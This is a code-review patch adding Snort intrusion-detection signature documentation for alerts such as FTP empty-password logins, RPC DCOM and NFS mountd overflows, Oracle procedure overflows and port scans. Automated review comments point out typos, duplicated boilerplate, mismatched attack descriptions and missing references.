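Review bot: `This informs an attacker that version of BIND running is 9 or greater` and `Affected Systems: BIND versions 9.` are both missing words (`the version`, `BIND version 9 and later`). The Ease of Attack example `dig @ns.com authors.bind txt chaos` uses a real domain as the server; use a placeholder such as `@<nameserver>`. Corrective Action mentions `modifying the servers configuration file` without saying how; naming the mechanism (defining a local CHAOS-class `authors.bind` zone in named.conf, the same approach used to mask `version.bind`) would make the advice actionable.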
--- /dev/null
+++ b/doc/signatures/1758.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1758
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
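Review bot: this doc is fully generic: Summary (`a known vulnerability on a web server or a web application`), Affected Systems (`All systems using a web server`) and Attack Scenarios (`the attack scenarios are legion`) never say what sid 1758 matches, and Additional References is empty. The credential-validation paragraph in Detailed Information is the same boilerplate used in the CGI docs in this patch. State the URI or pattern the rule looks for and the product it targets; without that an analyst cannot triage the alert.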
--- /dev/null
+++ b/doc/signatures/489.txt
@@ -0,0 +1,75 @@
+Rule:
+  
+--
+
+Rule:
+--
+Sid:
+489
+
+--
+
+Summary:
+This event is generated when an attempt is made to log into an ftp 
+server with an empty password.
+
+--
+
+Impact:
+Possible unauthorized access, invalid login attempt.
+
+--
+
+Detailed Information:
+An attempt was made to log into an ftp server with an empty password. 
+This is an unusual behavior as every ftp login usually has a password, 
+even anonymous ones. An empty password might mean the system was already
+compromised and a username exists with no password.
+
+--
+
+Affected Systems:
+Machines running ftp servers.
+
+--
+
+Attack Scenarios:
+An attacker gains access to the system via a vulnerability, creates a 
+login without a password and then tries to ftp to the system with that 
+login.
+
+--
+
+Ease of Attack:
+Simple, no exploit software required.
+
+--
+
+False Positives:
+There might be legitimate users on the system with empty passwords, but 
+not very likely.
+
+--
+
+False Negatives:
+None known.
+
+--
+
+Corrective Action:
+Check all the usernames on the system for empty passwords.
+
+--
+
+Contributors:
+Original Rule Writer Max Vision <vision@whitehats.com>
+Snort documentation contributed by Chaos <c@aufbix.org>
+
+-- 
+
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS322
+
+--
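Review bot: the file opens with `Rule:` twice (`Rule:` / `--` / `Rule:`) before `Sid:`; remove the duplicate so the layout matches the other docs. Detailed Information claims `every ftp login usually has a password, even anonymous ones` and that an empty password `might mean the system was already compromised`; anonymous FTP conventionally takes an e-mail address as the password, but many servers accept an empty `PASS` and some clients send one, so `not very likely` in False Positives understates this. List anonymous logins and clients sending an empty PASS as expected false-positive sources, and tighten Corrective Action to checking for accounts with empty password hashes.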
--- /dev/null
+++ b/doc/signatures/2184.txt
@@ -0,0 +1,65 @@
+Rule:
+
+--
+Sid:
+2184
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known vulnerability in the xlog function of certain Linux NFS Utils packages.
+
+Specifically this event is generated when TCP is used as the attack medium.
+
+--
+Impact:
+Denial of Service (DoS), possible arbitrary code execution.
+
+--
+Detailed Information:
+The mountd Remote Procedure Call (RPC) implements the NFS mount protocol. A vulnerability exists in some versions of the Linux NFS Utilities package prior to 1.0.4 that can lead to the possible execution of arbitrary code or a DoS against the affected server.
+
+A programming error in the xlog function may be exploited by an attacker by sending RPC requests to mountd that do not contain any newline characters. This causes a buffer to overflow thus presenting the attacker with the opportunity to execute code.
+
+--
+Affected Systems:
+Systems using Linux NFS Utils prior to version 1.0.4.
+
+--
+Attack Scenarios:
+An attacker may send a specially crafted RPC request or mount command to the NFS server that does not contain any newline characters.
+
+--
+Ease of Attack:
+Moderate.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Limit remote access to RPC services.
+
+Filter RPC ports at the firewall to ensure access is denied to RPC-enabled machines. 
+
+Disable unneeded RPC services.
+
+Upgrade to the latest non-affected version of the software.
+
+Apply the appropriate vendor supplied patches.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
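Review bot: Additional References is empty although Detailed Information names a precise affected range (Linux NFS Utils prior to 1.0.4) and a precise function (xlog); cite the advisory those details came from so readers can verify them. The Summary's "Specifically this event is generated when TCP is used as the attack medium" implies a sibling UDP rule; naming that sid would help. There are also two blank lines under the Additional References heading where the other files leave one.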
--- /dev/null
+++ b/doc/signatures/3394.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3394
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
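Review bot: Attack Scenarios does not match the rest of the file: Detailed Information describes malformed data sent to an RPC port, but Attack Scenarios describes "a request for a file with an overly long filename via a network share", which is a different vector; rewrite it in terms of the malformed RPC request the rule looks for. Typo in Ease of Attack: "Expoit" should be "Exploit". Additional References is empty; list the vendor bulletin that the "vendor supplied patches" in Corrective Action refers to.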
--- /dev/null
+++ b/doc/signatures/100000164.txt
@@ -0,0 +1,59 @@
+Rule: 
+
+--
+Sid: 
+100000164
+
+-- 
+Summary: 
+This event is generated when an ICMP packet crafted to exploit a denial of 
+service vulnerability in the Linux kernel is detected.
+
+--
+Impact:
+A denial of service will be caused against vulnerable hosts. If an attacker 
+sends a continuous stream of such packets, the host can be prevented from 
+functioning properly for a prolonged period of time.
+
+--
+Detailed Information:
+Linux kernel versions below 2.6.13 contain a flaw which will result in a null 
+pointer dereference when processing ICMP packets that contain invalid SCTP 
+data. In order to be vulnerable, a host must have SCTP enabled.
+
+--
+Affected Systems:
+Any Linux system with a kernel version < 2.6.13 with SCTP enabled.
+
+--
+Attack Scenarios:
+An attacker could use a script to send malformed packets to a vulnerable host.
+
+--
+Ease of Attack:
+Simple, as a publicly available exploit script exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade Linux systems' kernel to version 2.6.13 or higher. Alternately, disable 
+SCTP or use a firewall to block ICMP traffic at your network's border.
+
+--
+Contributors:
+rmkml
+Sourcefire Research Team
+
+--
+Additional References
+Other:
+http://oss.sgi.com/projects/netdev/archive/2005-07/msg00142.html
+
+--
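Review bot: the "Additional References" heading is missing its trailing colon, unlike every other heading in the file and in the rest of the patch. In Corrective Action, "use a firewall to block ICMP traffic at your network's border" is broader than the flaw needs: Detailed Information says the null pointer dereference is triggered only by ICMP packets containing invalid SCTP data and only when SCTP is enabled, so qualify the advice (block at the border only if you accept losing all ICMP, or prefer the kernel upgrade or disabling SCTP, which the same sentence already offers).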
--- /dev/null
+++ b/doc/signatures/2862.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2862
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure add_priority_number
+. This procedure is included in
+sys.dbms_repcat_conf.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
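Review bot: in Detailed Information the sentence naming the procedure is split so the full stop sits alone at the start of the next line ("add_priority_number" / ". This procedure is included in"); join it to read "the procedure add_priority_number. This procedure is included in sys.dbms_repcat_conf." Affected Systems reads "Oracle Oracle9i" (duplicated word). "None Known" in False Positives and False Negatives lacks the closing period used elsewhere, and the "--" separators carry trailing whitespace.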
--- /dev/null
+++ b/doc/signatures/3424.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3424
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
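Review bot: this file repeats the text of 3394.txt above word for word and carries the same problems: Attack Scenarios (overly long filename via a network share) does not describe the malformed RPC request that Detailed Information describes, "Expoit" is misspelled in Ease of Attack, and Additional References is empty. If sids 3394, 3395, 3424 and 3190 cover the same vulnerability with different content matches, say in the Summary what distinguishes this one, because the documentation currently gives no way to tell them apart.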
--- /dev/null
+++ b/doc/signatures/3395.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3395
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
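Review bot: same content as 3394.txt and 3424.txt above, with the same mismatch between Detailed Information (malformed RPC data) and Attack Scenarios (long filename over a network share), the same "Expoit" typo and the same empty Additional References. At minimum fix the typo here as well so the three files do not drift apart further; better, keep one copy of the shared text and state per sid which request or port the rule matches.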
--- /dev/null
+++ b/doc/signatures/2176.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid:
+2176
+
+
+--
+Summary:
+This event is generated when an attempt is made to access a system
+folder via SMB. 
+
+--
+Impact:
+Serious. This folder contains important operating system information.
+
+--
+Detailed Information:
+This event indicates that an attempt was made to access a folder
+containing important operating system files using SMB across the
+network.
+
+--
+Affected Systems:
+Microsoft Windows systems.
+
+--
+Attack Scenarios:
+If this folder is accessible via SMB the attacker can replace or view
+important operating system files.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the host for signs of system compromise.
+
+Turn off file and print sharing on the target host.
+
+Use a packet filtering firewall to disallow SMB access to the host from
+sources external to the protected network.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
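Review bot: the file never names the system folder the rule matches on, so Summary ("a system folder"), Impact ("This folder") and Attack Scenarios ("this folder") all refer to something the reader cannot identify; state the folder name in the Summary. Minor layout points: the Sid section has two blank lines before "--", "None Known." in False Negatives is capitalised differently from "None known." in the preceding section, and Additional References has an extra blank line.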
--- /dev/null
+++ b/doc/signatures/456.txt
@@ -0,0 +1,75 @@
+Rule:
+
+--
+Sid:
+456
+
+--
+Summary:
+This event is generated when an attempt is made to use ICMP as a
+reconnaisance tool.
+
+--
+Impact:
+Can be used as a reconnaissance tool.  Traceroute reveals information
+about the layout of a network.
+
+--
+Detailed Information:
+There are at least three different implementations of traceroute.  In
+one implementation traceroute works by sending an ICMP Echo Request
+packet to a destination host with a TTL value of 1.  If the host is more
+than one hop away, the first route that receives the back will send back
+an ICMP packet indicating that the TTL was exceeded.  The address of
+this router is then listed as the first hop.  The packet is then sent
+out again with a TTL of 2.  This continues until the destination host is
+able to reply or some maximum TTL value is reached.
+
+The other two implementations use the same TTL-based concept with an
+ICMP type of 30(traceroute) or with an UDP packet destined for an
+ephemeral port.
+
+--
+Affected Systems:
+All
+
+--
+Attack Scenarios:
+
+Traceroute is often used against machines on a network prior to an
+attack.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Block inbound ICMP type 30 messages.
+
+--
+Contributors:
+Original Rule Writer Max Vision <vision@whitehats.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by  by Steven Alexander<alexander.s@mccd.edu>
+
+--
+Additional References:
+
+Miscellaneous
+http://www.faqs.org/rfcs/rfc1393.html
+
+
+
+
+
+--
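Review bot: the sentence "the first route that receives the back will send back an ICMP packet" in Detailed Information is garbled; it should read "the first router that receives the packet will send back an ICMP packet". Corrective Action ("Block inbound ICMP type 30 messages") addresses only one of the three traceroute implementations the same section describes; the Echo Request and UDP variants are unaffected by that block, so either say so or broaden the advice. Also: "reconnaisance" in Summary, "ICMP type of 30(traceroute)" needs a space, "an UDP" should be "a UDP", False Positives is empty, the last Contributors line reads "contributed by  by" with no space before "<alexander.s@mccd.edu>", and there are four trailing blank lines before the final "--".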
--- /dev/null
+++ b/doc/signatures/1554.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1554
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
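Review bot: the file describes "a CGI web application" and "a known vulnerability" without naming either, so Summary, Affected Systems ("All systems running CGI applications") and Corrective Action give the reader nothing to act on; name the application and the versions the sid covers. Typos in Detailed Information: "running ona web server" should be "running on a web server", and "attackers choosing" should be "attacker's choosing" (it appears twice). Additional References is empty.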
--- /dev/null
+++ b/doc/signatures/100000160.txt
@@ -0,0 +1,59 @@
+Rule: 
+
+--
+Sid: 
+100000160
+
+-- 
+Summary: 
+This event is generated when an abnormally larger number of packets are 
+received from a single source by an SIP-enabled host in a short period of time.
+
+--
+Impact:
+This can be an indication of a denial of service attack in progress.
+
+--
+Detailed Information:
+This rule is designed to detect overly large amounts of traffic coming from a 
+single host to the SIP port on an internal host, as it is possible to cause a 
+denial of service by sending a large number of packets with invalid data.
+
+--
+Affected Systems:
+Any which implement the SIP protocol.
+
+--
+Attack Scenarios:
+An attacker could use a script to flood a system with invalid messages, causing 
+a denial of service.
+
+--
+Ease of Attack:
+Simple, as it is trivial to write a script to generate random data.
+
+--
+False Positives:
+Known SIP proxies may receive a high volume of legitimate data, and NAT devices 
+may appear to be sending a larger amount of data than a regular host. It is 
+recommended that users whitelist known SIP proxies and NAT devices.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Use a firewall or other access-restriction device to block unwanted messages at 
+your network's border.
+
+--
+Contributors:
+Jiri Markl <jiri.markl@nextsoft.cz>
+Sourcefire Research Team
+
+--
+Additional References
+Other:
+
+--
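Review bot: "abnormally larger number of packets" in the Summary should be "abnormally large number of packets", and "an SIP-enabled host" should be "a SIP-enabled host". The "Additional References" heading lacks its colon and the "Other:" entry under it is empty; add a reference or drop the empty label. Detailed Information refers to "the SIP port" without saying which port the rule watches; state it so the whitelisting advice in False Positives can be applied to the right traffic.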
--- /dev/null
+++ b/doc/signatures/1517.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1517
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
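Review bot: identical text to 1554.txt above, including the unnamed application and the "ona" and "attackers" typos. If sids 1517 and 1554 cover different CGI applications, each file needs to say which one; if they cover the same vulnerability, state what distinguishes the two rules (URI, method or content match) so an analyst can tell the events apart.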
--- /dev/null
+++ b/doc/signatures/100000521.txt
@@ -0,0 +1,76 @@
+Rule:
+
+--
+Sid:
+100000521
+--
+Summary:
+This event is generated when an attempt is made to exploit an SQL injection 
+vulnerability in the "TPL Design TplShop" application running on a webserver. 
+Access to the file "category.php" with SQL commands being passed as the 
+"first_row" parameter may indicate that an exploitation attempt has been 
+attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to inject SQL code from a 
+remote machine via the "first_row" parameter in the "category.php" script used 
+by the "TPL Design TplShop" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to compromise the database backend for the 
+application, the attacker may also be able to execute system binaries or 
+malicious code of their choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using TPL Design TplShop
+--
+Attack Scenarios:
+An attacker can inject SQL commands to the backend database for an application 
+if user input is not correctly sanitized or checked before passing that input 
+to the database.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+SQL Injection Attack and Defense
+http://www.securitydocs.com/library/3587
+
+--
+
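Review bot: the third paragraph of Detailed Information (unauthorized access via weak credential checks, escalated privileges, trust relationships) is generic CGI boilerplate that does not describe SQL injection through the "first_row" parameter and sits oddly after the first two paragraphs; drop it or replace it with what an injected query against the backend can reach. The second paragraph is a comma splice ("... the database backend for the application, the attacker may also be able ..."); split it into two sentences. "running ona web server" should be "running on a web server". The Sid, Affected Systems and Contributors sections lack the blank line before "--" that the rest of the file uses.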
--- /dev/null
+++ b/doc/signatures/1541.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+1541
+
+--
+Summary:
+This event is generated when an attempt is made to ascertain which 
+version of fingerd is running on a host. 
+
+--
+Impact:
+Information gathering.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to ascertain which 
+version of the finger daemon is running on a host. This may be the 
+prelude to an attack against that finger daemon.
+
+--
+Affected Systems:
+Any host running fingerd.
+
+--
+Attack Scenarios:
+An attacker can determine which version of fingerd is running then 
+attempt to exploit fingerd if it is found to be vulnerable to attack.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Disallow access to fingerd from sources external to the protected 
+network.
+
+Disable the finger daemon.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+GNU Finger Manual:
+http://www.gnu.org/software/finger/manual/
+
+--
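Review bot: "None Known." in False Positives and False Negatives is capitalised differently from the "None known." used in most of this patch; minor, but worth making consistent. Otherwise the file reads cleanly, and its Additional References entry (the GNU Finger manual) is the pattern the files that leave that section empty should follow.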
--- /dev/null
+++ b/doc/signatures/122-10.txt
@@ -0,0 +1,93 @@
+
+
+Rule:
+
+--
+Sid:
+122-10
+
+--
+Summary:
+This event is generated when the pre-processor sfPortscan detects
+network traffic that may constitute an attack. Specifically an ip decoy
+protocol scan was detected.
+
+--
+Impact:
+Unknown. This is normally an indicator of possible network
+reconnaisance and may be the prelude to a targeted attack against the
+targeted systems.
+
+--
+Detailed Information:
+This event is generated when the sfPortscan pre-processor detects
+network traffic that may consititute an attack.
+
+A portscan is often the first stage in a targeted attack against a
+system. An attacker can use different portscanning techniques and tools
+to determine the target host operating system and application versions
+running on the host to determine the possible attack vectors against
+that host.
+
+More information on this event can be found in the individual
+pre-processor documentation README.sfportscan in the docs directory of
+the snort source. Descriptions of different types of portscanning
+techniques can also be found in the same documentation, along with
+instructions and examples on how to tune and use the pre-processor.
+
+--
+Affected Systems:
+	All.
+
+--
+Attack Scenarios:
+An attacker often uses a portscanning technique to determine operating
+system type and version and also application versions to determine
+possible effective attack vectors that can be used against the target
+host.
+
+--
+Ease of Attack:
+Simple. Many portscanning tools are freely available.
+
+--
+False Positives:
+While not necessarily a false positive, a security audit or penetration
+test will often employ the use of a portscan in the same way an
+attacker might use the technique. If this is the case, the
+pre-processor should be tuned to ignore the audit if so desired.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check for other events targeting the host.
+
+Check the target host for signs of compromise.
+
+Apply any appropriate vendor supplied patches as appropriate.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Daniel Roelker <droelker@sourcefire.com>
+Marc Norton    <mnorton@sourcefire.com>
+Jeremy Hewlett <jh@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Nmap:
+http://www.insecure.org/nmap/
+
+Port Scanning Techniques and the Defense Against Them - Roger
+Christopher, SANS:
+http://www.sans.org/rr/whitepapers/auditing/70.php
+
+Hypervivid Tiger Team - Port-Scanning: A Practical Approach
+http://www.hcsw.org/reading/nmapguide.txt
+
+--
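Review bot: the Summary says "an ip decoy protocol scan was detected" but nothing in the file explains what a decoy protocol scan is or how this event differs from the other sfPortscan events; one defining sentence, or a pointer to the specific section of README.sfportscan the file already cites, would make the event actionable. Typos: "ip" should be "IP", "reconnaisance" (Impact) and "consititute" (Detailed Information). "a targeted attack against the targeted systems" and "Apply any appropriate vendor supplied patches as appropriate" both repeat themselves. The file also opens with two blank lines before "Rule:".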
--- /dev/null
+++ b/doc/signatures/2868.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2868
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure add_update_resolution
+. This procedure is included in
+sys.dbms_repcat_conf.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
